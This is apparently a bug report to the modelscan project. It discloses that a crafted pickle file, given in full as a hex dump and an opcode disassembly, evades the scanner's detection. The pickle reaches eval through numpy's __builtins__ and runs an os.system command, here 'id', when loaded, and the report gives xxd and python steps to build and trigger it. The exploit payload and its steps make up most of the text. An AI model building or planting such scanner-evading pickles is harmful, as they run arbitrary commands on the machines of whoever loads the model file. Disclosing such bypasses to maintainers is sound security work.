[BUG] Security Vulnerability

[raghavverma-cpu]

Describe the bug
Modelscan scanned our malicious pickle file using modelscan.scanners.PickleUnsafeOpScan and reported no issues.

To Reproduce
Steps to reproduce the behavior:
The disassembly of the malicious file looks like this:

    0: \x80 PROTO      4
    2: \x95 FRAME      102
   11: \x8c SHORT_BINUNICODE 'numpy'
   18: \x8c SHORT_BINUNICODE 'size'
   24: \x93 STACK_GLOBAL
   25: \x94 MEMOIZE    (as 0)
   26: \x94 MEMOIZE    (as 1)
   27: \x8c SHORT_BINUNICODE 'numpy'
   34: \x8c SHORT_BINUNICODE '__builtins__'
   48: \x93 STACK_GLOBAL
   49: \x94 MEMOIZE    (as 2)
   50: \x94 MEMOIZE    (as 3)
   51: h    BINGET     1
   53: }    EMPTY_DICT
   54: }    EMPTY_DICT
   55: \x8c SHORT_BINUNICODE 'shape'
   62: h    BINGET     3
   64: s    SETITEM
   65: \x86 TUPLE2
   66: b    BUILD
   67: h    BINGET     1
   69: h    BINGET     1
   71: \x8c SHORT_BINUNICODE 'eval'
   77: \x86 TUPLE2
   78: R    REDUCE
   79: \x8c SHORT_BINUNICODE '__import__("os").system("id")'
  110: \x85 TUPLE1
  111: R    REDUCE
  112: .    STOP

1. Run echo "80049566000000000000008c056e756d70798c0473697a659394948c056e756d70798c0c5f5f6275696c74696e735f5f93949468017d7d8c0573686170656803738662680168018c046576616c86528c1d5f5f696d706f72745f5f28226f7322292e73797374656d28226964222985522e" | xxd -r > numpy_allowlist.pkl
2. Run python3 -m pickle numpy_allowlist.pkl and the output for the id command should be displayed in stdout.
3. Run modelscan -p numpy_allowlist.pkl to see that no issues were found

Expected behavior
Given that the pickle file uses numpy to execute malicious code, It is unexpected to see NumpyUnsafeOpScan not being used here to flag this behavior.

Screenshots

The above screenshot demonstrates Modelscan not reporting any issues for the malicious file we created

Environment (please complete the following information):

• OS: Debian Linux
• Modelscan Version 0.8.7